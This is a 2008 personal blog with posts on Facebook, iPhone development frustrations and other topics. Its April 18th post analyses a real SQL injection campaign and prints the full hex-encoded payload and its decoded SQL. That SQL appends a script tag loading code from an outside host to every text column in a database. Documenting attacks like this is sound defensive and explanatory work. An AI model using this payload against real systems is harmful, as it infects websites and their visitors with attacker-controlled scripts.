July 1st, 2008
MacArthur Manifesto
While recently listening to an edition of the Net@Night podcast, Amber MacArthur introduced a new segment of the show called Beef of the Week. She explained that she has basically been shutout of her Facebook account for months now. Turns out that she has too many friend requests and the Facebook platform cannot handle it. She is prevented from logging in and accepting the thousands of friends requests she has received. When she reached out to Facebook their answer was basically that there was nothing they could do and that she might try deleting all of the people that were attempting to befriend her. Not very social. Now Amber is kind of a Social Network poster child in that she dedicates most of her time promoting social media and networking and believes that the web is the best place to form communities. Seems to me that building their platform for and supporting users like Amber is in Facebook’s own best interest.
We use social networks like Facebook for many reasons. Most people use it as a place where they can keep up with their friends no matter where they are. But we are also seeing more and more groups being formed that relate to causes and charities. These are very important communities and networks like Facebook become more relevant as they host and support them. I spend a good part of my day thinking about how to promote organized social networks. The questions I ask myself include what tools or mechanisms are best for a particular social network. This typically boils down to a feature set and target demographic. NOW I am thinking I have to also consider if the platform can handle the load.
Should I create social networks on Facebook knowing they may not be able to handle it if it becomes popular?
User loyalty of Social Network websites has proven over time to be fickle. For the most part users go where their friends are. However, as we have seen in the past - my friends used to be at MySpace and now they are at Facebook. In a couple months they could be somewhere else. My main point is that if Facebook as a platform cant handle the vast numbers of people who flock to these types of communities they will fail and the users will go someplace else.
The Mission: To use Facebook against themselves. We must convince Facebook to fix their platform and to support people like Amber so we can continue to build important social communities. Maybe we should create a "Free Amber" Facebook Fan page.
June 19th, 2008
We often talk about telling our children to be careful about what they email, post to blogs or social networks, chat about online, tweet, instant message or whatever the kewl way to communicate is that day; telling them they need to be careful because the "Internet doesn’t forget". There is potential that everything they do online will stay online in some way permanent way. For my day job we think a lot about this because we are trying to help kids get into college. More and more universities are getting more hip and more technically fluent where they understand what a Facebook Wall is. Our kids need to be careful about what they say, who they say it to, what groups they join, etc… so that these universities dont hold it against them later.
A funny comic that Jeremy sent me…
April 23rd, 2008
Yup, had enough. So three major reasons:
- Can’t get my iPhone provisioned so that I can put the applications I write on to it because the iPhone Developer program is closed at the moment. (See my other posts on the subject)
- New 3G iPhone is strongly rumored to be coming out in the summer
- Email is just painful. Yahoo push mail is a joke. I blame both Apple and Yahoo for this, but mostly I believe it’s because of EDGE. My hope is that the 3G iPhone will have a chance of having productive like email capabilities.
My conclusion was to return the iPhone (can do this within 30 days), get the free Nokia and then come this summer upgrade to a new iPhone 2.0 with 3G. The rumors are also that the developer program will open up after the SDK is officially released.
My appreciation to the ATT store at 78th and Broadway for being so nice and understanding.
April 22nd, 2008
Sorry, but I am still steamed over the whole Developer program. Needed just one more rant about it…
Well, talk about taking the wind of out your sails.
Watch the momentum grow:
- I jumped in head first, bought an iPhone - hearts beating, new toy, I can touch it and it vibrates…
- Downloaded the SDK - WOW, Apple seems to have their shit together, gonna write my first Apple based program since college…
- Installed the tools - can’t believe Apple made good tools finally, the simulator looks rockin…
- Watched the videos - these are great, why are they all wearing the same tshirt, hope they make more of these…
- Read the documentation - ok, not so great, but more than I expected, they seem to be locking down the beta pretty good, why aren’t there more articles…
- Wrote my first program - heart is really racing now, I think I can do this, imagine the possibilities…
- Ran my app on the simulator - This thing really does rock, I hope it works this great on my phone, can’t wait to make my first commercial app, I am going to be a star at work, chicks will dig me…
- Switch the target from simulator to device - What does it mean "provision"?
So until they open back up the Developer program which is another friggin $100 I am more than willing to pay, I cant "provision" my friggin iPhone.
OY. Maybe the chicks will dig the simulator? Hold on while I compile….
More info:
http://www.macrumors.com/2008/03/14/apple-slowly-ramping-up-iphone-developer-program/
http://www.tuaw.com/2008/03/14/iphone-developer-rejection-letter-mass-mailing/
http://twitter.com/danielpunkass/statuses/771541151
http://twitter.com/davidweiss/statuses/771549002
http://www.iphoneatlas.com/2008/03/14/apple-rejecting-iphone-sdk-applicants-en-masse/
April 18th, 2008
So I got a hankering to make me some iPhone apps…Ok, I will stop talking like that. 
But it really was like that - last weekend I decided I wanted to make some simple iPhone apps, so I downloaded the SDK, signed up for the developer program and then earlier this week I bought mYself an iPhone.
According to Mossberg that was probably a mistake and probably a bigger one than I realized. He thinks the 3G version is coming out in June. My bad was that I didnt realize it but in order to actually install the programs you write with the sdk on to your device it needs to be "provisioned". Maybe this is an Apple thing, but this is my first venture into Apple coding so I was surprised by this. Anyway, I cant get provisioned until I am accepted into the developer program and pay my $99. And at the moment they are not accepting applications:
Thank you for applying to the iPhone Developer Program. We have many more requests than we can serve during this initial beta period, so we must limit the Program at this time. We plan to expand it during the beta period, and we will contact you regarding your enrollment status at the appropriate time. We appreciate your patience.
I hope to keep writing about my experience, but for now. See ya.
April 18th, 2008
Overview
So seeing sites hacked is pretty cool unless it’s one of yours. I kinda look at hacking as the end-all-be-all of elite programming. Of course, the intent isn’t always good, but the techniques are artful. I most recently witnessed an impressive SQL Injection hack on a website. I refer to it as the "414151 Hack", but others are calling a similar hack the "IFRAME SEO Poisoning Attack" which appears to be the same code just implemented a little differently. Of course anyone who has been hacked by this code will recognize these numbers. As far as SQL Injection attacks go this one seems to have taken a similar systematic approach. I am not going to go into the explanation of how SQL Injection works or the techniques hackers use - there are plenty of sources on the internet for that. I will list some references at the end.
The Details
There were a couple things that impressed me about this particular hack.
- The outcome was that the hack code inserted a <script> tag with a reference url into every varchar column in the database. The site was running .Net, IIS with SQL Server 2000. I mention the technology because the script assumes SQL Server. That said, don’t fool yourself to think that this is some hole within .Net, IIS or SQL Server - these attacks are due to lazy programmers who implement bad practices. Specifically inline or free SQL statements within code and could occur on any (most) platform, language or database. The resulting effect to the user was a slow experience due to the fact the script reference didn’t resolve. It was a good thing in that there was no telling what other damage might have been inflicted if the script was active.
- The second thing that impressed me was the actual code that executed this varchar manipulation. It was elegantly disguised (not sure if that was the intent) within a long hexadecimal string that when interpreted was an equally elegant SQL statement.
The Possibilities
The possibilities of this hack scare me (and impress me). When I started searching around the web for this 414151 script I found a good number of references. Unfortunately, I didn’t find too many people talking about the hack but instead I found hundreds of sites that were actually hacked also. I list one link below of an article that talks about it quite a lot. According to this article many large websites such as USA Today, ABC News, Target, Walmart, etc… have all been infected with a similar hack.
It is quite frightening when you think of such an effective and widespread hack that basically is designed to "phone home" and execute some unknown Javascript anytime the author decides to turn on his website (synchronized attack scenario) ….well…I think it would have made the news.
The Javascript
<script src=http://www.414151.com/fjp.js></script>
The Hexadecimal
4400450043004C00410052004500200040005400200076006100720
06300680061007200280032003500350029002C00400043002000760061007
20063006800610072002800320035003500290020004400450043004C00
41005200450020005400610062006C0065005F0043007500720073006F
007200200043005500520053004F005200200046004F005200200073006
5006C00650063007400200061002E006E0061006D0065002C0062002E
006E0061006D0065002000660072006F006D0020007300790073006F006
2006A006500630074007300200061002C0073007900730063006F006C
0075006D006E00730020006200200077006800650072006500200061002
E00690064003D0062002E0069006400200061006E006400200061002E
00780074007900700065003D00270075002700200061006E00640020002
80062002E00780074007900700065003D003900390020006F007200200
062002E00780074007900700065003D003300350020006F007200200062
002E00780074007900700065003D0032003300310020006F0072002000
62002E00780074007900700065003D00310036003700290020004F00500
045004E0020005400610062006C0065005F0043007500720073006F007
20020004600450054004300480020004E004500580054002000460052004
F004D00200020005400610062006C0065005F0043007500720073006F
007200200049004E0054004F002000400054002C0040004300200057004
80049004C004500280040004000460045005400430048005F005300540
041005400550053003D0030002900200042004500470049004E00200065
007800650063002800270075007000640061007400650020005B002700
2B00400054002B0027005D00200073006500740020005B0027002B0040
0043002B0027005D003D0072007400720069006D00280063006F006E0
07600650072007400280076006100720063006800610072002C005B0027
002B00400043002B0027005D00290029002B00270027003C007300630
0720069007000740020007300720063003D0068007400740070003A002F
002F007700770077002E003400310034003100350031002E0063006F00
6D002F0066006A0070002E006A0073003E003C002F0073006300720069
00700074003E0027002700270029004600450054004300480020004E00
4500580054002000460052004F004D00200020005400610062006C00650
05F0043007500720073006F007200200049004E0054004F00200040005
4002C0040004300200045004E004400200043004C004F00530045002000
5400610062006C0065005F0043007500720073006F0072002000440045
0041004C004C004F00430041005400450020005400610062006C0065005
F0043007500720073006F007200
The SQL Statement
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor
CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or
b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM
Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN
exec(’update [’+@T+’] set [’+@C+’]=rtrim(convert(varchar,[’+@C+’]))+
”<script src=http://www.414151.com/fjp.js></script>”’)FETCH NEXT
FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor
DEALLOCATE Table_Cursor
Other references
Update (4/29)…
This one keeps going and going.
I also wanted to add that another very impressive part of this hack is how the hacker finds a vulnerable page and then iterates through many different scenarios until one clicks. I didn’t mention this earlier because this is inherent in all SQL Injection attacks.
April 17th, 2008
Any IT organization that’s willing to do without training, innovation, process improvements, client relationship building and other "keep-the-business-viable" activities is only postponing its inevitable demise.
March 24th, 2008
Guess who is?
Of all the general personality types, ENFJ’s are the most outgoing and friendly. Their chief concern in life is other people, and fostering harmony and cooperation, between themselves and others. They are more than willing to do your share in relationships. They try, always, to be friendly, sympathetic, cooperative and tactful.
They have strong ideals and a potent sense of loyalty, whether to an employer, a school, a hometown, or a favourite cause. One thing is certain: they do tend to idealize the people and things they value, and they like to be held in similarly high esteem.
They are a judging type, and disorganized situations strike them as chaotic. They are distinctly uncomfortable when they’re obliged to function without a schedule, a plan, or a clear idea of the objectives to be achieved.
If need be, they’ll provide the necessary direction, but they don’t insist on setting all the rules themselves. They accept authority.
They’re patient and conscientious. They make a concerted effort to stick to a job until it’s finished, and they believe it’s important to pay attention to detail. Perhaps more significantly, they base their personal habits on a feeling of obligation to the task, their profession, their friends, family and co-workers, or to the institution itself.
They don’t mind letting others know what their values are, and-given the authority-they may insist that others follow their code and their standards.
The combination of feeling and judgment is also the fertile soil upon which righteous indignation flowers. They may find it helpful to temper their strong feeling with a less emotional thinking approach to judgment and to balance their judgment with more open-minded perception.
February 29th, 2008
Came time that I needed a presence. I used to redo my website every year, sometimes everys six months. Well, it has been a while but lately I feel the necessity to jump back in. Through WordPress I can get things off and running and the thought was I would spend my time creating content instead of design but then it took me two days to pick a theme that someone else made. Best intentions I guess. Thanks for visiting.
